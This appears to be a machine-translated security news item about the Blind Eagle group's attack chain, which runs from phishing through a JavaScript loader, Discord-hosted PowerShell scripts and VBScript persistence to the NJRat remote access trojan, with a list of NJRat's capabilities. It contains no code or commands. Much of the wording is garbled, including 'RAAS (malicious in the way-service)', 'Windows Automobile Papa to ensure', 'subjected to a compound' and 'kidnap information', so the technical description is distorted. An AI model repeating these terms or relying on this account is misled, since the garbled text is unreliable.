Specialists from IB-Company Threatmon have reported that the Blind Eagle cyberspying group is conducting a new multi-stage attack chain. The attack leads to the deployment of a Trojan of remote access (RAT) NJRat on compromised systems.
Blind Eagle (APT-C-36) is presumably a Spanish group that has been based in South America. It has been targeting enterprises of private and public sectors in Colombia, Ecuador, Chile and Spain.
The campaign discovered by Threatmon consists of several steps. The system is compromised using RAAS (malicious in the way-service), social engineering attacks, or phishing attacks. Then a JavaScript-loader is loaded into the system, which performs the PowerShell scenario posted in the Discord CDN. The script delays another PowerShell scenario and the Windows package file, and then saves the VBSCRIPT file in the Windows Automobile Papa to ensure. The package file is subjected to a compound for launching the PowerShell scenarios delivered earlier with this file. Finally, the NJRAT is installed on the system.
Njrat (aka Bladabindi) was first discovered in 2013. It has many opportunities that allow attackers to collect confidential information and receive control over compromised computers. Once installed on the system, NJRat provides cybercriminals with complete remote access to it. They can carry out malware, modify the Windows Register, download/delete files, execute commands, extract computer data, write down keyboard presses, abduct passwords, complete processes and make screenshots.
On February 27, the BlackBerry research group reported that Blind Eagle was able to impersonate the state tax agency of Colombia and Ecuador to kidnap information from government, financial and many other institutions of these countries.
It’s a worrying situation that Cybersecurity experts are keeping an eye on.